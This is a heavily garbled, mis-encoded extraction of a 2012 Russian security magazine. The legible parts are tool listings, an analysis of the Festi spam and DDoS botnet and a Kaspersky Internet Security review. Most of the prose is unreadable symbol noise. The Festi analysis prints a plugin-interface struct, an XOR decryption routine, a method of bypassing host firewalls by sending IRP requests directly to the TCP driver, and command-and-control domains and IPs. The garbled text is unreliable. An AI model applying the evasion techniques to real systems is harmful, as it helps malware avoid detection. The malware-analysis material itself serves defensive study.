@$& /(C(G*+"+ D(")%)* #D((" J#-E#B M#$K"C # /C)'D)"CI#E E$+'')* # D(")%)* /C#$)P(,#&. 8 /C)JC+DDA /C#&",AB # /)-,&",AB GUI-#,"(CM(B', C(.!$K"+"A C+-)"A D)P,) *A*)%#"K E+E * E),')$K /C#$)P(,#&, "+E # * )"%($K,AB M+B$ %$& %+$K,(BN(J) +,+$#.+.

TQ0>:0U 17 QV>WV7UU7U0 :7 JAVA

QV>24VX4U 24Y-R4V20R? :7 R9>Z<>R96 WS-Attacker — D)%!$K,AB MC(BD*)CE, ,+-/#'+,,AB ,+ Java, %$& /C)*(%(,#& "('")* ,+ /C),#E,)*(,#( F(C(. *(--'(C*#'A. QC)-JC+DD+ ,+ *G)% .+/C+N#*+(" /!"K %) WSDL (Web Services Description Language) # #.*$(-E+(" #. ,(J) *'L /)$(.,!L #,M)CD+H#L %$& "('"#C)*+,#&: D(")%A ' /+C+D("C+D# # "+E %+$((. ;C(BD*)CE &*$&("'& C+'N#C&(DAD ' /)D)IKL /$+J#,)* # * '*)(D ')'"+*( /) !D)$F+,#L #D((" "C# /$+J#,+, C(+$#.!LI#G '$(%!LI#( +"+E#:• Signature Wrapping;• SOAPAction Spoofing;• WS-Addressing Spoofing.

Q) C(.!$K"+"+D C+-)"A /$+J#,)* /C)JC+D-

D+ '+D+ )")-C+P+(", E+E#( D(")%A # E+E#D +"+E+D /)%*(CP(,A. Q)D#D) S")J) /C)JC+DD+ "+EP( '/)')-,+ * !%)-,)D *#%( )")-C+P+"K G+C+E"(C#'"#E#:• #,"(CM(B')*;• D(")%)*;• .+/C)')*.

QC)JC+DD+ /).*)$&(" +*")D+"#F('E#

# *C!F,!L (' ,($(J#"#D,AD# %+,,AD#) M)CD#-C)*+"K .+/C)'A E *(--'(C*#'+D # /C)'D+"C#-*+"K )"*("A.

>R @3X :7R9>X[0\ ANONYMOUS Tails (The Amnesic Incognito Live System) — S") Live DVD #$# Live USB )/(C+H#),,+& '#'"(D+, ,+H($(,,+& ,+ ')GC+,(,#( E),M#%(,H#+$K-,)'"# # +,),#D,)'"# '*)(J) /)$K.)*+"($& * '("# 0,"(C,(" ,(.+*#'#D) )" ")J), J%( ), ,+G)%#"'& # .+ FK#D E)D/KL"(C)D '#%#". :#E+E#G '$(%)* ,( )'"+,("'&, ('$# *A ,( .+G)"#"( )-C+",)J) &*,). R#'"(D+ -+.#C!("'& ,+ Debian GNU / Linux. Tails C+'/C)'"C+,&-("'& ' ,('E)$KE#D# *'"C)(,,AD# # .+C+-,(( 'E),M#J!C#C)*+,,AD# * '))"*("'"*## ' "C(-)*+,#&D# -(.)/+',)'"# /C#$)P(,#&-D#: *(---C+!.(C)D, E$#(,")D DJ,)*(,,AG '))-I(,#B, /)F")*AD E$#(,")D, )M#',AD /+E(")D, C(%+E")C)D #.)-C+P(,#& # .*!E)* # "+E %+$((.

2 /(C*!L )F(C(%K /C# '*)(B C+-)"( Tails )/#C+("'& ,+ +,),#D,!L '("K Tor: *'( /C)JC+DD,)( )-('/(F(,#( ,+'"C)(,) ,+ /)%-E$LF(,#( F(C(. Tor, # /C&DA( (,( +,),#D,A() ')(%#,(,#& -$)E#C!L"'&. Tails /C# '*)(B C+-)"( +-')$L",) ,( #'/)$K.!(" P('"E#B %#'E E)D/KL"(C+, ,+ E)")C)D C+-)"+(", — *'& )-C+-)"E+ %+,,AG /C)#'G)%#" ")$KE) * )/(-C+"#*,)B /+D&"#, E)")C+& )F#I+("'& /)'$( *AE$LF(,#& E)D/KL"(C+.

9+EP( '#'"(D+ #'/)$K.!(" -)$KN)( E)$#F('"*) EC#/")JC+M#F('E#G "!$., 'C(%# E)")CAG LUKS, HTTPS Everywhere, OpenPGP, OTR # Nautilus Wipe.

4 5 6

!"#$%: Deesse KaURL: code.google.com/p/quarkspwdump/&'(#)*+: Windows

!"#$%: Christian MainkaURL: sourceforge.net/proj-ects/ws-attacker&'(#)*+: Windows/Linux

!"#$%: AnonymousURL: tails.boum.org&'(#)*+: Linux

!"#$%: Arshan DabirsiaghiURL: code.google.com/p/javasnoop&'(#)*+: Windows/Linux

MALWARE

!"#$% 09 /164/ 2012082

!"#$%# %& '()(*'#+, Festi &,%-#(.('/+,0 -,' 1/ )-/2%) 1.%3%-,), -/ 20,+-4( %& -%5 6+(. 7/-1(.+45, 1/ '(* 6(-8 9#/ /6%- %& ',)45 ,$#%+-45 '1,)-:/#/+, , +/-+#/.45 — 9#/# :/#-(# 3,'#/ %'1/08&"(#'; 60; DDoS-,#,$. < #/)" =( 9#/ 6/+/08-/ -(#%1%3-4* 9$&()10;. +.(6/-/'-/2/ >?, ,+#/.4 $/#/./2/ 1/6/@0% /3(-8 '(.8(&-/ $ 1./A(''" (2/ .,&.,:/#$%

Festi:!"#$%&' ( $)*+)")*%&'

!"#$"%&'"() '*+,!(**-#,. !+,$.,", *( /!0 %!-/'"**-1- «$-!-2() #%")"»

()(*'#+/ ."#$%#/+ Festi %&+('#-/ ' 2009 2/6, % + 1(.+"B /3(.(68 1./'0,+%0/'8 ),''/+4)% .,''40$,)% '1,), % A(0(-,1.,+0(--4)% DDoS-,#,$,)% (.%'. 1). 7 -,3,0(

#($"C(2/ 2/6, 1./@0/ '(.8(&-/( /:-/+0(-%( :/#-(#, % )%2.,A%; -, -/+4( $/),-6-4( '(.+(.4 (.%'. 2). D)(--/ 9#/ /:-/+0(-%( % 1.%+0($0/ -,@( +-%),-%( — '0%@$/) )-/2/( 1/)(-;0/'8. 7/-1(.+45, %&)(-%0'; 1./#/$/0 +&,%)/6(*'#+%; ' $/),-6-4) A(-#./): ('0% .,-8@( 9#/ :40 HTTP ' &,@%E./+,--4) POST-/#+(#/), #/ '(*3,' 9#/ '1(A%,08-/ .,&.,:/#,--4* 1./#/$/0 ' +/&-)/=-/'#8B /:5/6, .,&0%3-45 &,C%#-45 '.(6'#+, ,-,0%&%."BC%5 '(#(+/* #.,E%$. 7/-+#/.45, +'( &,6,-%; 60; :/#/+ &,2."=,B#'; #/08$/ + 1,);#8 &,.,=(--/* ),@%-4, % 3#/ -,%:/0(( %-#(.('--/ — &,2."=,B#'; /-% + ,6.('-/( 1./'#.,-'#+/ -, "./+-( ;6., /1(.,A%/--/* '%'#()4.

C

F!GDHI<HJ!F FESTI K./11(. -(/:5/6%) #/08$/ 60; "'#,-/+$% /'-/+-/2/ E"-$A%/-,0, + +%6( 6.,*+(.,, $/#/.4* /'"C('#+0;(# +'B /'-/+-"B ,$#%+-/'#8. L, .%'. 3 1.(6'#,+0(- 2.,E +4&/+, E"-$A%* 1/'0( +41/0-(-%; #/3$% +5/6, 9#/2/ 6.,*+(.,.

?'-/+-/* &,6,3(* 9#/2/ )/6"0; ;+0;(#'; +&,%)/6(*'#+%( ' $/-),-6-4) A(-#./) % "'#,-/+$, 6/1/0-%#(08-45 )/6"0(*.

L,)% :40/ &,)(3(-/ 6+, /'-/+-45 6/1/0-%#(08-45 )/6"0; — 60; .,''40$% '1,), % 60; /'"C('#+0(-%; DDoS-,#,$ '//#+(#-'#+(--/. M+/B .,:/#" :/# -,3%-,(# ' /:.,C(-%; -, $/),-6-4* A(-#. % 1/0"3(-%; ,$#",08-/2/ &,6,-%;, 1/'0( 3(2/ '$,3%+,(#'; '//#+(#'#+"BC%* 10,2%-. 7'( .,'@%.(-%; ,$#%+%."B#'; -(-1/'.(6'#+(--/ %& 1,);#% % -( '/5.,-;B#'; -, 6%'$(, 3#/ '"C(-'#+(--/ &,#."6-;(# 1./A('' $.%)%-,0%'#%3('$/* 9$'1(.#%&4, #,$ $,$ 1/'0( +4$0B3(-%; $/)18B#(., +/''#,-/+%#8 A(0% % &,6,3% $/-$.(#-/2/ :/#, 1.,$#%3('$% -(+/&)/=-/.

IC( /6-/* %-#(.('-/* /'/:(--/'#8B 9#/2/ :/#, ;+0;(#'; #/, 3#/ /- -,1%',- -, C++ ' %'1/08&/+,-%() ??>. >/6/:-4( +(C% -(3,'#/ )/=-/ +'#.(#%#8 1.% .,&.,:/#$( )/6"0(* .(=%), ;6.,. ?'-/+-4( (2/ $/)1/-(-#4 ($0,''4):• )(-(6=(. 1,);#%;• '/:'#+(--,; .(,0%&,A%; '/$(#/+;• 1,.'(. 1./#/$/0, +&,%)/6(*'#+%; ' C&C;• )(-(6=(. 10,2%-/+.

M5(), +&,%)/6(*'#+%; )(=6" -%)% %&/:.,=(-, -, .%'. 4. N, '3(# .,&.,:/#,--/2/ "./+-; ,:'#.,$A%% /'-/+-/( ;6./ Festi )/=(# :4#8 0(2$/ 1/.#%./+,-/ 1/6 6."2%( /1(.,A%/--4( '%'#()4, + #/) 3%'0( /#0%3-4( /# MS Windows.

!"#$%&'() *&+),%,-, Senior Virus Researcher, Eset

Festi: !"#$%&' ( $)*+)")*%&'

!"#$% 09 /164/ 2012 083

!"#. 2. $"%&'(") &*+,"+' -' -./01 ,.2'-3-01 #1&/1&0

!"#. 3. 4&'5 /06./' 5*-,("7 8.#91 /08.9-1-") +.:," /;.3'

!"#. 4. <6'"2.317#+/"1 21=3* ,.28.-1-+'2" &*+,"+'

!"#. 1. >. #+'+"#+",1 M86 Security Labs, ?.+-1+ Festi 6'-"2'1+ 8.:1+-.1 +&1+@1 21#+.

,-,./01 2314-567 58($#"9:(' (%+);)* <;)=*+8>"?@+ *8A( <"8B(%&, +8C C8C (A)%%# <;( <#A#D( %(E >&<#"%?@+*? !8=8%(?, <#"FG)%%&) #+ C#A8%=%#B# H)%+;8. ,(*+)A8 <"8B(%#> ;)8"(!#>8%8 <# <;(%H(<F A8**(>8 FC8!8+)")' %8 *<)H(8"9%# #<;)=)")%%&) *+;FC+F;&.

,+;FC+F;8 #<(*&>8)+ <"8B(% ( <;#+#C#" #$A)%8 =8%%&A( * %(A. 7#**+8%#>")%%&' > <;#H)**) #$;8+%#B# 8%8"(!8 >8;(8%+ *+;FC+F;& >&B"?=(+ *")=F@D(A #$;8!#A:

struct PLUGIN_INTERFACE{ // Initialize plugin PVOID Initialize; // Release plugin, perform cleanup operations PVOID Release; // Get plugin version information PVOID GetVersionInfo_1; // Get plugin version information PVOID GetVersionInfo_2; // Write plugin specifi c information into tcp stream PVOID WriteIntoTcpStream; // Read plugin specifi c information from tcp strteam // and parse data PVOID ReadFromTcpStream; // Reserved fi elds PVOID Reserved_1; PVOID Reserved_2;};

I#B=8 $#+ <);)=8)+ =8%%&) > C#A8%=%&' H)%+;, >&<#"%?)+*? #$-;8$#+C8 <"8B(%#> ( 8C+(>(;F)+*? JF%CH(? WriteIntoTcpStream() ="? C8K=#B# !8;)B(*+;(;#>8%%#B# <"8B(%8. 2;( <#"FG)%(( =8%%&E * *);->);8 >&<#"%?)+*? =;FB8? JF%CH(? — ReadFromTcpStream(). ,+;FC+F;8 =8%%&E, <);)=8>8)A&E <# *)+(, <;)=*+8>")%8 %8 ;(*. 7.

7!8(A#=)'*+>() * <"8B(%8A( #$)*<)G(>8)+ A)%)=K); <"8B(-%#>, C#+#;&' !8B;FK8)+ *##+>)+*+>F@D(' <"8B(% ( #+>)G8)+ !8 )B# C#;;)C+%#) >&<#"%)%(). I8K=&' <"8B(% *#=);K(+ =>) LC*<#;+(-;F)A&) JF%CH((:

• PLUGIN_INTERFACE *CreateModule(PVOID DriverInterfaces)• VOID DeleteModule().

2#"%&' H(C" !8B;F!C( <"8B(%8 A#K%# F>(=)+9 %8 ;(*. 8.

,/./76M 2N6.6I63 7 Festi ;)8"(!#>8% *#$*+>)%%&' !8D(D)%%&' #+ <);)E>8+8 <;#+#-C#". O#+%)+ (*<#"9!F)+ C"()%+-*);>);%F@ +#<#"#B(@ * %)*C#"9C(A( C#A8%=%&A( H)%+;8A(. 58<;(A);, #=(% #+>)G8)+ !8 ;8!=8GF !8=8-%(' %8 ;8**&"CF *<8A8, 8 =;FB#' +#"9C# !8 <;#>)=)%() DDoS-8+8C.

,)+)>#' <;#+#C#" ;8$#+8)+ > %)*C#"9C(E J8!8E:• (%(H(8"(!8H(? — <#"FG)%() IP-8=;)*#> 8C+(>%&E

C#A8%=%&E H)%+;#>;• 8C+(>8H(? — <#"FG)%() +)CFD)B# !8=8%(?

(! C#A8%=%#B# H)%+;8.

7 <);>#' J8!) #*FD)*+>"?)+*? !8<;#* %8 !8;8%)) FC8!8%%&) DNS-*);>);& * H)"9@ <#"FG)%(? IP-8=;)*#> ="? FC8!8%%&E =#-A)%#>, C#+#;&) E;8%?+*? > C8G)*+>) C#%*+8%+ > +)") *8A#B# $#+8. 7 J8!) 8C+(>8H(( <;#(*E#=(+ >!8(A#=)'*+>() <# <;#+#C#"F TCP, <#"FG8)+*? +)CFD)) !8=8%() ( <"8B(%.

2;#+#C#" ="? >+#;#' J8!& *#*+#(+ (! !8B#"#>C8 *##$D)%(? ( %)<#*;)=*+>)%%# $FJ);8 * *8A(A <"8B(%#A. 7 $FJ);) *#=);K8+*? =8%%&) * +)B-#;()%+(;#>8%%&A <;#+#C#"#A (G)A-+# <#E#K %8 XML), ;8!=)" =8%%&E, *#=);K8D(' %)<#*;)=*+>)%%# <"8B(%, !8:(J;#->8% *")=F@D(A 8"B#;(+A#A:

Win32/FestiPlugin Manager

Win32/FestiC&C Protocol

Pasrser

Win32/FestiMemory Manager

Win32/FestiNetwork Socket

C&C migrationAutumn 2011

vilturt.rupyatochek.ruvaldispit.ru

Beginning 2012

muduck.ru (173.212.248.51)moduck.ru (173.212.248.51)reghostin.ru (178.162.179.47)hostikareg.ru (178.162.179.47)

!"#$%# FESTI &'(')*+' +,#%-%.+/0 1$2,3-)4! (!,&'+'5+'6' -'. 7(#'!/ '.,+* 5,!*,2+' -'&'8)% $ -!'9,55" ,6' !72!7:'#$%

MALWARE

!"#$% 09 /164/ 2012084

Festi !"#$%&$'"()$ !#%*"#+", -./$'$" %,/.&'$). !#$ !%0%1$ *23%*. 45-)6$$ KdDebug-gerEnabled(), . ,.)7" 50"", (-$0.,8 .!!.#.,-2" ,%')$ %(,.-%*., 5(,.-.*/$*.+ * -$9 -5/"*%" 3-.'"-$".

!"#$%" FESTI

key = (0x17, 0xFB, 0x71,0x5C)def decr_data(data): for ix in xrange(len(data)): data[ix] ^= key[ix % 4]

!"#!$ HIPS % &'()'*'+,# -./01!+ !234 56 537898:3;< =:=>833=:78? Festi — =><=2 64@573;< :982:7A, B:743=AC833;< 34 6494D833=E F=EGHI7898. Festi A:7945A487:J B9=A38E 35D8, K8E L7= 984C56B87:J A :74324973;< 294?A894< NDIS, F=7=9;8 94>=74I7 34 F434CH3=E B9=A38. $CJ =7G94AF5 5C5 G958E4 :878A;< G4F87=A =7F9;A4I7:J 38G=:982-:7A833= B:79=?:7A4 \Device\Tcp 5C5 \Device\Udp A 64A5:5E=:75 =7 75G4 G9=7=F=C4. + >=CHM53:7A8 G89:=34CH3;< E8D:878A;< LF94-3=A 5C5 HIPS 984C56=A43= 34>CI28358 K8986 G898<A47 64G9=:=A IRP_MJ_CREATE_FILE, F=7=9;8 34G94ACJI7:J 7943:G=973=EB 294?A89B =7F9;7=N= B:79=?:7A4. -7=7 :G=:=> G=6A=CJ87 74FD8 B:743=A57H G9=O8::, =7 F=7=9=N= >;C= 535O559=A43= :878A=8 A645E=28?:7A58.

P=2=>3;? E=357=953N E=D3= 984C56=A47H 2ABEJ :G=:=>4E5:• B:743=A57H <BF 34 ZwCreateFile 2CJ E=357=953N4 A:8< G=G;7=F

=7F9;75J B:79=?:7A4;• 38G=:982:7A833= 4774K 34 \Device\Tcp 5C5 \Device\Udp 2CJ

G898<A474 A:8< IRP-64G9=:=A.

Festi 2CJ =><=24 G=2=>3=N= E=357=953N4 :=>:7A833;E5 :5C4E5 984C56B87 QB3FO5I ZwCreateFile(), G94F75K8:F5 2B>C59BJ 88 (:<8EB 984C564O55 QB3FO55 ZwCreateFile() :E. 34 95:. 9).

%6 G982:74AC833=? :<8E; A523=, K7= Festi :=62487 =>R8F7 :AJ65 : B:79=?:7A=E 5 34G9JEBI G=:;C487 64G9=:; IRP_MJ_CREATE 7943:G=973=EB 294?A89B. *4F5E =>946=E, A:8 64@573=8 P!, =7-:C8D5A4I@88 B:79=?:7A4 \Device\Tcp 5C5 \Device\Udp, G9=GB:757 64G9=:; =7 >=74. $CJ G9JE=N= A645E=28?:7A5J : B:79=?:7A4E5\Device\Tcp 5C5 \Device\Udp A982=3=:3=? G9=N94EE8 3BD3; BF4-6478C5 F :==7A87:7ABI@5E =>R8F74E B:79=?:7A (device objects). $CJ G=CBK835J BF46478CJ 34 Tcpip.sys 34 =>R8F7 294?A894 E=D3= 5:G=CH6=A47H:

&'(. 6. &)*+',*-'. ('(/)01 2+*3'456

&'(. 5. &7/8'/ 4*9*+ :*;5/7!

&'(. 8. <5+41= -'8+ ,*3:7,8' 2+*3'4*

&'(. 7. >/:78/7:* 2):)?*6*)01@ 25 ()/' ?*441@

Win32/FestiDropper

Win32/Festikernel-mode

driver

Install kernel-mode driver

Download plugins

Win32/FestiPlugin 1

Win32/FestiPlugin 2

Win32/FestiPlugin N

&'(. 9. !+56:)?4*. :)*+',*-'. A748-'' ZwCreateFile()

Execute ObCreateObjectto create file object

Initialize security attributes of created file object

Execute OblnsertObject to insert created file object intoFILE_OBJECT type list

Create IRP request withMajorFunction code set to

IRP_MJ_CREATE

Send created IRP request directly to tcpip.sys driver

Array of pointersto plugins

Plugin1 Plugin 1struct PLUGIN_INTERFACE

Plugin 2struct PLUGIN_INTERFACE

Plugin 3struct PLUGIN_INTERFACE

Plugin Nstruct PLUGIN_INTERFACE

Plugin2

Plugin3

PluginN

Festi: !"#$%&' ( $)*+)")*%&'

!"#$% 09 /164/ 2012 085

NTSTATUS ObReferenceObjectByName ( IN PUNICODE_STRING ObjectName, IN ULONG Attributes, IN PACCESS_STATE AccessState OPTIONAL, IN ACCESS_MASK DesiredAccess OPTIONAL, IN POBJECT_TYPE ObjectType, IN KPROCESSOR_MODE AccessMode, IN OUT PVOID ParseContext OPTIONAL, OUT PVOID *Object );

,+# %)-#./0)%+(1#23%%34 *(*+)0%34 5/%.6(4, 7#"/839:34 2 .38)*+2) #-%#;# (! 73130)+1#2 9%(.#--*+1#./ * (0)%)0 /*+1#'-*+23. Festi #*/:)*+2"4)+ (+)136(9 7# 2*)0/ *7(*./ /*+1#'*+2, 8+#$& %3'+( %/<%#) *##+2)+*+2(). =#**+3%#2")%%&' .#- >+#' 71#-6)-/1& 71)-*+32")% %3 1(*. 11.

?@ABCDEF GHGCIJG AA?-KALG G%3"(! %)*.#"M.# !3+1/-%("# 71(*/+*+2() AA?-.#-3, +3. .3. *#-21)0)%%&) (%*+1/0)%+& #$13+%#;# 3%3"(!3 ( -3<) IDA %) /0)9+ >55).+(2%# );# 2#**+3%32"(23+M. K 71(0)1/, 2#**+3%#2")%() ;1353 7#+#.3 /7132")%(4 2 N++ /*"#<%4)+*4 7#"(0#15(!0#0 %3 /1#2%) 2(1+/3"M%&O 5/%.6(', 8+# 7#.3!3%# %3 1(*. 12.

N"#<%#*+M !3."983)+*4 2 +#8%#0 7#"/8)%(( 3-1)*3 71#6)-/-1&, .#+#134 $/-)+ 2&!23%3. N+3+(8)*.(' 3%3"(! %) -3)+ (%5#103-6(( # +#0, ./-3 $/-)+ /.3!&23+M 1);(*+1 EAX. L"4 +#;# 8+#$& 7#-"/8(+M 3-1)*, %/<%# 2&4*%(+M, ;-) *#!-3)+*4 #$P).+ /.3!3%%#;# +(73, 3 >+# 71#(*O#-(+ %)7#*1)-*+2)%%# 2 71#6)**) 2&7#"%)%(4, ( (0)%%# +#;-3 (%(6(3"(!(1/)+*4 /.3!3+)"M %3 +3$"(6/ 2(1+/-3"M%&O 0)+#-#2.

H3 1(*. 13 71(2)-)% 71(0)1 .#%*+1/.+#13 ."3**3 CSocket, 1)3-"(!#23%%#;# 2 Festi. =(-%#, 8+# 71#(*O#-(+ %)71#!138%&' 2&!#2 ( (%(6(3"(!36(4 /.3!3+)"4 CSocket::vTable %3 +3$"(6/ 2(1+/3"M%&O 0)+#-#2.

= KGQDNR=D JGKCSQDHIT @/+.(+ Festi -#2#"M%# %)+(7(8%&' >.!)07"41 21)-#%#*%#;# ?A, 32+#1& .#+#1#;# 7#-#U"( #8)%M *)1M)!%# . 71#6)**/ );# 13!13$#+.(. A%( 71)-/*0#+1)"( 0%#<)*+2# %93%*#2, .#+#1&) #$)*7)8(239+ %)!30)+%#) 71(*/+*+2() >+#;# $#+3 2 *(*+)0) -"(+)"M%#) 21)04 ( !3+1/-%49+ #$13+%&' 3%3"(!. K 71(0)1/, %3 0#0)%+ (!2")8)%(4 >.!)07"41#2 21)-#%#*%&O 7"3;(%#2 (! 7304+( !313<)%%#' *(*+)0& %( #-(% 3%+(2(1/*%&' 71#-/.+ (O %) #$%31/<(23".

?1#$")0& * 7#"%&0 3%3"(!#0 *"#<%#;# 21)-#%#*%#;# ?A 2#!-%(.39+ -#2#"M%# 83*+#, %# "(UM 7#"%&' 3%3"(! 0#<)+ *#$13+M 2)*M 73!" 6)"(.#0 ( %3'+( >55).+(2%&) *7#*#$& 71#+(2#-)'-*+2(4 +3.(0 /;1#!30. z

!"#. 10. $%&'()* +,-+. #/0.&'01+ 23

!"#. 11. 24+50.647, +,47,78)97:'7& #;"#+< TCP– " UDP-6#84+*#89

!"#. 12. 2+/"=+4>"%= (7 64+9(0 9"4867/?()- >6(<5"*

!"#. 13. 24"=04 <+(#846<8+47 </7##7 CSocket

IRP IRP

Attacheddevice #N

Attacheddevice #N

Attacheddevice #1

Attacheddevice #1

\Device\Tcpor

\Device\Udp

\Device\Tcpor

\Device\Udp

forward

dispatch dispatch

forward

Filterdriver #N

Filterdriver #N

Filterdriver #1

Filterdriver #1

Tcpip.sysdriver

Tcpip.sysdriver

MALWARE !"#$%&'() *+,+-%$./

!"#$% 09 /164/ 2012086

!"#$%" &"'()* +,-%.- ' &-&"#/* 012-3* #* +,4.*054 4 0 4#/",#"-/1 #-0-6 0",'44 7*'+",* (KAV 4 KIS). 8- 9/-&: +-0-3: &-;#- <1.- <1 #" #*+,(=*/$'(, "'.4 <1 #" #"5-/-,1" #-0-00"3"#4(, 5-/-,1" #*& +-5*>*.4'$ 4#/","'#1&4, 0 '0(>4 ' ?"& &1 4 ,"%4.4 #*&:/4/$ 9/-/ #"<-.$%-6 -<>-,?45.

!"#$% #&'()%!"#!$ %&'(') &'$%** «+,%-'$%+!.!» '*&1&4 #*'/-(@4&4 -5#*&4, 0 5-/-,1" >.--

:&1%."##45: 3-'/*/-?#- .4%$ +-'/:?*/$'(, * /-?#"" — 5*5 '."3:"/ 3-.<*#:/$ +- #4& exploit pack’-&. A-0*( 0",'4( 7*'+",* -/0"?*"/ 95'-+.-6/*& '4&&"/,4?#- — 3-<*040 0 '0-6 +,-3:5/ -/3".$#:B C:#5)4B >*@4/1 -/ 95'+.-6/-0, 5-/-,*( 5-#/,-.4,:"/ ,*<-/: +-/"#)4*.$#- 31,(012 +,-=,*&& (#:, /"2 '*&12), +,-0",("/, #"/ .4 0 42 3"6'/04(2 +,4>#*5-0 95'/,"&4>&*, 4 '0-"0,"&"##- >*+,"@*"/ /-, ?/- 3".*/$ #" +-.*=*"/'(, — #*+,4&",, +","2-3 +- +-3->,4-/".$#1& ''1.5*& 4.4 +-+1/54 >*+4'4 0 ?:;-6 +,-)"''.

0+11#'2&)./ ][: D'/$ -3#* &*."#$5*( +,-<."&*. E4,&965",1 4&"B/ 3-'/:+ 5 /"& ;" 0",'4(& internet security, ?/- 4 -<1?#1" +-.$->-0*/".4. F#4 4'+-.$>:B/ 9/-/ C*5/ 0 '0-"6 ,*<-/". 8-9/-&: '/-+,-)"#/#:B :0","##-'/$ 0 /-&, ?/- #-016 KIS >*@4/4/ /"<( -/ .B<-6 #"4>0"'/#-6 :=,->1, 4'+1/10*/$ #" +,42-34/-'(. F<#-0.(/$ 8F, <1/$ 2-,-%4& &*.$?45-& 4 %*,4/$'( +- '-0'"& >.-'/#-&: inappropriate content’: 4>-+-3 04,/:*.$#-6 &*%4#1 ' .4-#:5'-& 4.4 &*5-'$B (>*/- 5,*'40-!) 0'" ,*0#- 4&""/ '&1'..

-!*%+ /0#&*1!%2') G'."34/$ >* 0'"&4 +-/"#)4*.$#-

:(>04&1&4 +,-=,*&&*&4 0,:?#:B #" /*5 +,-'/- — +,-=,*&& &#-=-, * :(>04&-'/4 3.( #42 +-(0.(B/'( 5*;316 3"#$. A-016 7*'+", 4&""/ 3-'/:+ 5 <*>" Secunia — /-6 '*&-6, 5-/-,*( 01+:'5*"/ >*&"?*/".$#:B Secunia Personal Software Inspector (PSI) — +,-=,*&&:, '5*#4,:B@:B :'/*#-0."##16 #* 5-&+" '-C/ #* :(>04&-'/4. H"+",$ 0'" 9/4 :3-0-.$'/04( 3-'/:+#1 4> KIS. I",$">#-, Secunia — -/.4?#*( <"'+.*/#*( +,-=* ' 2-,-%"6 <*>-6. D'.4 : /"<( #"/ 3"#"= #* 7*'+",*, +-'/*0$ 2-/( <1 "" 0&"-'/" ' 5*54&-#4<:3$ 2*.(0#1& *#/404,:'-& 4> #*%42 -<>-,-0.

"'#!-,%34' -5,2'(*I*&-" 4#/","'#-" #-0-00"3"#4". J*#$%"

+-.$>-0*/".B #:;#- <1.- '*&-'/-(/".$#- 05.B?*/$ ,";4& <">-+*'#-=- <,*:>",* 4 01>1-0*/$ 95,*##:B 5.*04*/:,:, ?/- <1.- '.4%5-& '.-;#- 3.( ',"3#"=- +-.$>-0*/".(. I5*;4/" '+*'4<-, ?/- -# 0--<@" +-'/*04. *#/404,:'! I+*'4<-, /"+",$ -# <:3"/ 3".*/$ 9/- (4 5-"-?/- "@") '*&-'/-(/".$#-. I+")4*.$#*( '4'/"&* /"+",$ <:3"/ ,*'+->#*0*/$ -<,*@"#4" #* '*6/ <*#5*, +,-0",(/$, #" C4%4#=-016 .4 9/-/ '*6/, '0",(/$ '",/4C45*/1 4 -3#-0,"&"##- +,-0",(/$ '4'/"&: (/0-B '4'/"&:) #* #*.4?4"

1

4

KFJLMNL MDHEDJ7N ANAFOAAFENPOQ 5,4/4?"'542 :(>04&-'/"6. J*>:&""/'(, +--+1/54 3,:=42 :'/*#-0."##12 #* 5-&+$B/"," +,-=,*&& +-4#/","'-0*/$'( 4#C-,&*)4"6, ' 5-/-,-6 /1 ,*<-/*"%$ 0- 05.B?"##-& ,";4&" «<">-+*'#12 +.*/";"6», <:3:/ +,"'"5*/$'(.

0+11#'2&)./ ][: J"*.$#- +-.">#*( C4?*. 8-.$>-0*/$'( RSF '/*#-04/'( ="&-,,-6#"" ' 5*;31& =-3-&, 4 #4?"=- ' 9/4& #" +-3"-.*"%$ — <">-+*'#-'/$ 4 :3-<'/0- 0'"=3* .";*.4 #* ,*>#12 ?*%*2 0"'-0. T-,-%-, ?/- 2-/( <1 ?*'/$ 9/-6 <">-+*'#-'/4 <:3"/ *0/-&*-/4>4,-0*#*. I &#-=-C*5/-,#-6 *0/-,4>*)4"6, #*3"B'$, /1 '*& '+,*04%$'(, 2-/( 4 ' #"6 0 '.:?*" ?"=- &-=:/ #*6/4'$ +-&-@#454 ;).

#,6*2, &&!7, % +5,&*,2/$4E4,/:*.$#*(, >*@4@"##*( -/ +","20*/*

5.*04*/:,*, 5.*04%4 #* 5-/-,-6 #*3- #*;4&*/$ &1%5-6, <1.* 4 0 +,-%.-6 0",'44. E #-0-6 0",'44 3-<*04.4 >*@4/: 00-3* ' *++*,*/#-6 5.*04*/:,1 — -#* *5/404>4,:"/'( *0/-&*/4?"-'54, 5-=3* /1 -<,*@*"%$'( #* '*6/ <*#5*.

,&2!1,2*#*$!&,33,0 "!$8",% 9+%-5!)2,1*

8,-3:5)4( Ndobe, '/*,1" Internet Explorer’1 4 Java 3*0#- 4 +,-?#- >*,"5-&"#3-0*.4 '"<(

2

KASPERSKYInternet Security

3

!"#$% 09 /164/ 2012 087

Kaspersky Internet Security: !"#$% #&'()%

!"#$%"&$#' ()%$*#"+%$ — %,-,&. /00,)% "% *&,1"#"+#"'" 23 4"5#" "%)(%$%.

*+,-./ 0'12!" 12)#)34 5"647"#$3&6% ()8!$31'!9: (;$!&'":. <"!)3"', =9(3'$% 5'"#&';$, 5"6!$% 5'"#&';$ — #(&, ;$; ) '$!4>&. /$7#& ?3" '$="-3$&3 ?134 5"=9(3'&&. @ «A$="'$3"')) +$(5&'-(;"8"» 13#&'B2$C3, ?3" !"#$% #&'()% 5')2&3(% ;" 2#"'1 2$B& !$ !&3=1;$D, — 5"D"B&, ?3" 3$; "!" ) &(34, !$ :"&: (3$'&!4;": Asus EEE PC 1001PX ( '$(>)'&!!"E 2" 2 F= RAM # 3&?&!)& 2#1D !&2&64 "("=9D 3"':"7"# !& !$=6C2$&3(%.

/GHI0.AJ*+IK +G-0/GAJ L"6"39& !16&#9& 7$;"!?)6)(4, ) B)7!) 5"2'$(3$CM&:1 5";"6&!)C 3&5&'4 ("#(&: !& (3$6". @ «B&(3";)&» ;":54C3&'!9& )8'9 )8'$34 — (3'"8" ( 14 6&3, 5'"! (:"3'&34 — 3" 6) ( 18, 3" 6) #""=M& ( 21... @ "=M&:, )!3&'!&39 =1>1C3, $ "=M&(3#&!!9& 2&%3&6) !$(3$)#$C3, ?3" !$2" 2&'B$34, 7$5'&M$34 ) !& 51M$34. @ 2&6& ="'4=9 (" >;"64!);$:)

